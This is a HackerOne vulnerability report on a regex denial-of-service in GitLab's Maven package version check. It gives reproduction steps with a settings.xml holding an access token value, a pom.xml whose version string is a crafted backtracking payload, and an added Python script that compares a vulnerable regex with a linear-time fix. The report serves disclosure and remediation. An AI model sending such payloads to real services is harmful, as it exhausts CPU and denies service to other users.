Maven package version ReDoS

HackerOne report #997961 by anyday on 2020-10-05, assigned to @ngeorge1:

Report

Hello,

Maven package version check https://docs.gitlab.com/ee/user/packages/maven_repository/#version-validation contains catastrophic backtracking: aaaa....! (!32925 (merged))

Steps to reproduce:

Follow Maven guide https://docs.gitlab.com/ee/user/packages/maven_repository/

  • generate project
    mvn archetype:generate -DgroupId=com.mycompany.mydepartment -DartifactId=my-project -DarchetypeArtifactId=maven-archetype-quickstart -DinteractiveMode=false

  • create settings.xml with your access token (e.g. at /root/.m2/settings.xml)

<settings>
  <servers>
    <server>
      <id>gitlab-maven</id>
      <configuration>
        <httpHeaders>
          <property>
            <name>Private-Token</name>
            <value>srzc2-M3ysZx-ZEKQRki</value>
          </property>
        </httpHeaders>
      </configuration>
    </server>
  </servers>
</settings>

Edit pom.xml with

<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
  <modelVersion>4.0.0</modelVersion>
  <groupId>com.mycompany.mydepartment</groupId>
  <artifactId>my-project</artifactId>
  <packaging>jar</packaging>

  <version>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!/x</version><!-- regular expression denial of service -->

  <name>my-project</name>
  <url>http://maven.apache.org</url>
  <dependencies>
    <dependency>
      <groupId>junit</groupId>
      <artifactId>junit</artifactId>
      <version>3.8.1</version>
      <scope>test</scope>
    </dependency>
  </dependencies>

  <properties><!-- Maven was complaining about something -->
    <maven.compiler.source>6</maven.compiler.source>
    <maven.compiler.target>6</maven.compiler.target>
  </properties>

  <!-- replace(3) 'gitlab.com' and 'PROJECT_ID' (comment kept free of "--" so the POM stays well-formed XML) -->
  <repositories>
    <repository>
      <id>gitlab-maven</id>
      <url>https://gitlab.com/api/v4/packages/maven</url>
    </repository>
  </repositories>

  <distributionManagement>
    <repository>
      <id>gitlab-maven</id>
      <url>https://gitlab.com/api/v4/projects/PROJECT_ID/packages/maven</url>
    </repository>
    <snapshotRepository>
      <id>gitlab-maven</id>
      <url>https://gitlab.com/api/v4/projects/PROJECT_ID/packages/maven</url>
    </snapshotRepository>
  </distributionManagement>
</project>

  • mvn deploy

Video:
mvn_redos.mp4

Impact

Denial of service, CPU exhaustion
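The report names the failure mode (a version-validation regex that backtracks catastrophically on a long run of word characters followed by a character the pattern cannot accept) but does not show the pattern itself. The script below is an added example, not the reporter's code and not GitLab's fixed or unfixed regex: it pairs a hypothetical regex of the ReDoS-prone shape (a repeated group whose body carries its own quantifier) with a hypothetical linear-time replacement, measures how match time grows with payload length, and wraps the safe pattern in a length-bounded validator that a maintainer can test against the reported payload shape before shipping. The names VULNERABLE_VERSION_RE, SAFE_VERSION_RE, MAX_VERSION_LENGTH, is_valid_version, redos_payload, time_match and growth_factor are all assumptions of this example.

```python
import re
import time

# Hypothetical regex with the shape that produces catastrophic backtracking:
# a repeated group whose body has its own quantifier, so a run of word
# characters can be split between iterations in exponentially many ways
# before the end anchor fails on the trailing "!". Illustration only; this
# is not the pattern GitLab used.
VULNERABLE_VERSION_RE = re.compile(r"^([\w+-]+\.?)+$")

# Hypothetical linear-time replacement: each repeated group must begin with a
# literal "." separator, so there is exactly one way to partition the input
# and a failed match costs O(n) backtracking steps instead of O(2^n).
SAFE_VERSION_RE = re.compile(r"^[\w+-]+(\.[\w+-]+)*$")

# Defence in depth: bound the input length before the regex ever runs.
MAX_VERSION_LENGTH = 255


def is_valid_version(version: str) -> bool:
    """Validate a package version with the linear-time pattern."""
    if len(version) > MAX_VERSION_LENGTH:
        return False
    return SAFE_VERSION_RE.fullmatch(version) is not None


def redos_payload(n: int) -> str:
    """Constructed input in the shape the report used: n word characters
    followed by characters no version may contain, forcing a failed match."""
    return "a" * n + "!/x"


def time_match(pattern: re.Pattern, text: str) -> float:
    """Wall-clock seconds for one fullmatch attempt (the result is discarded)."""
    start = time.perf_counter()
    pattern.fullmatch(text)
    return time.perf_counter() - start


def growth_factor(pattern: re.Pattern, n_small: int, n_large: int) -> float:
    """How much slower the pattern gets when the payload grows from n_small to
    n_large characters: stays small for a linear pattern, roughly
    2 ** (n_large - n_small) for the exponential one."""
    small = max(time_match(pattern, redos_payload(n_small)), 1e-9)
    large = time_match(pattern, redos_payload(n_large))
    return large / small


if __name__ == "__main__":
    for n in (10, 14, 18):
        vuln = time_match(VULNERABLE_VERSION_RE, redos_payload(n))
        safe = time_match(SAFE_VERSION_RE, redos_payload(n))
        print(f"n={n:2d}  vulnerable: {vuln:8.4f}s  safe: {safe:.6f}s")
    print("growth 12->18, vulnerable:", round(growth_factor(VULNERABLE_VERSION_RE, 12, 18)))
    print("growth 12->18, safe:      ", round(growth_factor(SAFE_VERSION_RE, 12, 18), 2))
    print("1.0-SNAPSHOT valid:", is_valid_version("1.0-SNAPSHOT"))
    print("payload valid:     ", is_valid_version(redos_payload(50)))
```

Running the script shows the vulnerable pattern's time roughly doubling with every extra character while the safe pattern stays in the microseconds; the same growth_factor check can be dropped into a test suite so a regression to a nested-quantifier shape is caught before it reaches a request handler.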

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

How To Reproduce

Please add reproducibility information to this section: